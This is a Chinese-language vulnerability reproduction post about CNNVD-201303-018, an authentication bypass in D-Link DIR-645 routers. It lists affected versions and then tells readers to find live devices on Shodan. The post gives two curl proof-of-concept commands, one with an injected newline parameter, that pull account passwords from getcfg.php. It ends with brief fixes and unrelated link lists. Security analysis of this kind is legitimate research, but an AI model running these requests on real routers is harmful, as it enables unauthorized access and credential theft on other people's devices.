【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现
目录
- 0x00 漏洞概述
- 0x01 影响版本
- 0x02 漏洞评级
- 0x03 shodan搜索漏洞环境
- 0x04 漏洞验证
- 0x05 修复建议
0x00 漏洞概述
友讯科技股份有限公司(D-Link Corporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品。
D-Link DIR-645是一款无线路由器。D-Link DIR-645路由器1.03之前的版本(不包含1.03)中存在远程认证绕过漏洞。远程攻击者利用该漏洞绕过身份验证机制进而获得未授权访问权限。在1.03 ~ 1.06版本中,虽然有权限的检查,但是由于cgibin程序中代码逻辑出现了问题,导致可绕过校验,实现泄露。
0x01 影响版本
DIR-645 < 1.03
1.03 ≤ DIR-645 ≤ 1.06
0x02 漏洞评级
高危
0x03 shodan搜索漏洞环境
本文以1.02和1.04版本为例子进行漏洞复现
使用shodan搜索"DIR-645"。
找到对应版本的漏洞环境。
0x04 漏洞验证
针对1.03之前版本(不包含1.03)的POC代码如下:
curl -d "SERVICES=DEVICE.ACCOUNT" "http://xx.xx.xx.xx/getcfg.php"
执行后可以成功获取到账号密码。
针对在1.03之后1.06之前版本(包含1.06)的POC代码如下:
curl -d "SERVICES=DEVICE.ACCOUNT&attack=ture%0aAUTHORIZED_GROUP=1" "http://xx.xx.xx.xx/getcfg.php"
执行后同样可以成功获取到账号密码。
0x05 修复建议
1、访问限制白名单
2、升级最新产品
【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现相关推荐
- CVE-2017-5521: Bypassing Authentication on NETGEAR Routers(Netgear认证绕过漏洞)
SpiderLabs昨天发布的漏洞, 用户访问路由器的web控制界面尝试身份验证,然后又取消身份验证,用户就会被重定向到一个页面暴露密码恢复的token.然后通过passwordrecovered.c ...
- 一个“登录框“引发的安全问题
前言 搞安全的小伙伴只有一个登录框你都能测试哪些漏洞? 通常大家测试的都会测试关键部分,为了有更好的测试效果,小厂会提供给你用户名密码:但是一些比较重要的企业,而这个环境却是正式环境,里面存放着一些数 ...
- Apache Qpid 认证绕过漏洞
漏洞名称: Apache Qpid 认证绕过漏洞 CNNVD编号: CNNVD-201303-222 发布时间: 2013-03-13 更新时间: 2013-03-13 危害等级: 漏洞类型: ...
- 无线路由器挖洞方法大比拼:白盒 or 黑盒?
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 ZDI 发布博客文章,比较了黑盒和白盒挖洞方法的优劣.如下是对文章的编译. 去年,我们披露了两个认证绕过漏洞 ZDI-20-1176 ...
- 学习笔记-B/S - Exploits
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeC ...
- 一个登录框引发的“安全问题”
一个文本框可能存在哪些漏洞 前言 用户名枚举 弱口令 空口令 登录认证绕过 存在暴力破解风险 图形验证码不失效 短信验证码绕过 短信验证码可暴力破解 短信验证码可预测 短信炸弹 恶意锁定问题 密码明文 ...
- 一个文本框可能存在哪些漏洞
一个文本框可能存在哪些漏洞 前言 用户名枚举 弱口令 空口令 登录认证绕过 存在暴力破解风险 图形验证码不失效 短信验证码绕过 短信验证码可暴力破解 短信验证码可预测 短信炸弹 恶意锁定问题 密码明文 ...
- 基于Armitage的MSF自动化集成攻击实践
基于Armitage的MSF自动化集成攻击实践 目录 0x01 实践环境 0x02 预备知识 0x03 Armitage基础配置 0x04 Nmap:Armitage下信息搜集与漏洞扫描 0x05 A ...
- BMC 历史漏洞汇总
刚开始接触 BMC 以为研究的人比较少,感觉一般人也没有机会接触到.尤其是服务器风扇的声音,一般人也不想去碰.去查了一下 CVE 之后,发现有不少漏洞,还挺多人玩的.近期也在研究这一块,把 BMC 曾 ...
最新文章
- windows环境下,django + mongoengine + mongodb环境配置
- Linux 文件夹含义(转)
- 【网络安全】如何搭建MySQL恶意服务器读取文件?
- Codeforces
- python接口测试-项目实践(八) 完成的接口类和执行脚本
- [原创] 盟军敢死队2 - 3D模型/动作浏览器
- python——学习笔记1
- 最流畅的手机,性能、跑分却弱爆了?2019年上半年手机数据报告出炉
- 宅在家里写数据库中函数应用
- 工业机器人控制系统的设计框架
- 项目整体管理:结束项目或阶段
- 全年股价暴涨超110% TTD能否杀出巨头们的围墙花园?
- eclipse32位安装教程_Maya2015 (64位) 软件安装教程
- win10千万不要重置_Win10系统如何自动恢复到出厂设置,小白式操作教程
- Revit API、AddInManager、RevitLookup、SDK的用途
- FairyGUI基础学习笔记
- 第五届 蓝桥杯 海盗分金币 C语言
- tkinter Canvas 实现 鼠标手绘画板 功能
- oracle数据库报300006,Bad HDD - Restoring VMs
- 使用TextToSpeech语音读取
热门文章
- 获取各大电商平台商品详情api(api接口)
- 从消息推送来看,华为、小米做得最好
- 感恩节(11.28)
- Qt读取/写入Excel数据--QAxObject
- HTML文件命名_没有删不掉的文件:强制终止、一键解锁,样样精通
- 若用MASM写操作系统的启动部分如何实现? 其他开发语言 / 汇编语言 - CSDN社区 community.csdn.net
- 锐龙r7 5800x怎么样 相当于什么水平
- android Studio Crunching Cruncher
- 深圳基因组所刘永鑫组招聘博士后4名(3年100万+文章奖励+项目绩效)
- ios 开发控件中心点_iosapp开发控件大盘点